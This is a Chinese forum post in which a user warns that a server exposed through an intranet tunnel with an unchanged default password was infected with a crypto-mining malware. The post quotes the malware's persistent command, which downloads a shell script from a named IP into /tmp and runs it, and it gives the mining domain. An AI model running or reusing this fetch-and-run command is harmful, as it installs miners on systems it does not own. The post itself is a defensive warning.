• 本站招聘各个版块版主共同发展,有意可私聊站长

服务器中加密货币诈骗网站病毒了

Telegram账号购买找【ITCRY】-顶级号商 https://itcry.com/

alpha1023

Active member
Lv0
Lv1
Lv2
10
消息得分
注册
2025-06-11
消息
1,183
反馈评分
7
怪不得cpu一直100%

大家做内网穿透一定要记得改密码,默认密码不改一天就中招

06122ba247da50fa.png


会一直从这个网址下载病毒:



CMD (/usr/bin/bash -c 'cd /tmp && bash <(curl -s )' &)

解释:你的系统每隔一段时间就会自动从这个恶意 IP (173.234.15.182) 下载一个叫 check1.sh 的脚本并执行。就是这个脚本在反复下载并启动 Error84



域名:andrewtatemunityxcrypto.com 是一个极其明显的恶意挖矿域名。

PPID 为 1:说明它被伪装成了系统服务,由 systemd 开机自动启动,或者作为守护进程在后台运行。
 
后退
顶部